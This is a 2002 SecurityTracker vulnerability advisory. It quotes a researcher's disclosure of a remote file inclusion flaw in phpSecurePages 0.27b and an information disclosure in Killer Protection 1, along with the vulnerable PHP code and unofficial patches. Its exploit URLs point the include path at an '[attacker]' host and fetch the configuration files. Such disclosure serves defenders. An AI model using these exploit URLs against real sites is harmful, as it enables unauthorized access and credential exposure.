SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Forum/Board/Portal)  >   phpSecurePages Vendors:   Kruyt, Paul
phpSecurePages Include Error In 'checklogin.php' Lets Remote Users Access The System
SecurityTracker Alert ID:  1005370
SecurityTracker URL:  http://securitytracker.com/id/1005370
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Oct 8 2002
Impact:   User access via network
Exploit Included:  Yes  
Version(s): 0.27b
Description:   A vulnerability was reported in phpSecurePages. A remote user can access the application without authenticating.

It is reported that the 'checklogin.php' script does not properly restrict the '$cfgProgDir' variable. A remote user can specify a remote location for the directory, allowing the remote user access the application without authenticating.

Some demonstration exploit URLs are provided:

http://[target]/checklogin.php?cfgProgDir=http://[attacker]/
or
http://[target]/checklogin.php?cfgProgDir=http://[attacker]/&login=1
with
http://[attacker]/interface.php

Additional information is available (in French language) at:

http://www.frog-man.org/tutos/phpSecurePages.txt

Impact:   A remote user can bypass the authentication process and gain access to the application.
Solution:   No solution was available at the time of this entry.

The author of the report has provided the following unofficial fix:

Add the following statement at the begin of checklogin.php:

$cfgProgDir = './';

Vendor URL:  www.phpSecurePages.f2s.com/ (Links to External Site)
Cause:   Input validation error, State error
Underlying OS:  Linux (Any), UNIX (Any)

Message History:   None.


 Source Message Contents

Subject:  phpSecurePages & Killer Protection ( PHP )


1)
Informations :
Product : phpSecurePages
Tested version : 0.27b
Website : http://www.phpsecurepages.f2s.com
Problem : include file

PHP Code :
-------------- checklogin.php ---------------------
if (!$login) {
	// no login available
	include($cfgProgDir . "interface.php");
	exit;
}
if (!$password) {
	// no password available
	$message = $strNoPassword;
	include($cfgProgDir . "interface.php");
	exit;
}
-------------- checklogin.php ------------------

Exploit :
http://[target]/checklogin.php?cfgProgDir=http://[attacker]/
or
http://[target]/checklogin.php?cfgProgDir=http://[attacker]/&login=1
with
http://[attacker]/interface.php .

Patch :
Add this :
$cfgProgDir =  './';
at the begin of checklogin.php .

More details in french :
http://www.frog-man.org/tutos/phpSecurePages.txt
translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FphpSecurePages.txt&langpair=fr%7Cen&hl=en&ie=ISO-8859-1&prev=%2Flanguage_tools




2)
Informations :
Product : Killer Protection
Tested version : 1
Website : http://php3scripts.cjb.net
Problem : Informations disclosure

Exploit :
http://[target]/vars.inc
and
http://[target]/protection.php?mode=display&username=[LOGIN]&password=[PASSWORD]

Patch :
rename vars.inc >> vars.inc.php .
In protection.php, replace
require("vars2.inc");
bye
require("vars2.inc.php");


More details in french :
http://www.frog-man.org/tutos/KillerProtection.txt

translated by Google :
http://translate.google.com/translate?u=http://www.frog-man.org/tutos/KillerProtection.txt&langpair=fr%7Cen&hl=en&ie=ISO-8859-1&prev=%2Flanguage_tools




frog-m@n


_________________________________________________________________
Affichez, modifiez et partagez gratuitement vos photos en ligne: 
http://photos.msn.com/support/worldwide.aspx


 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC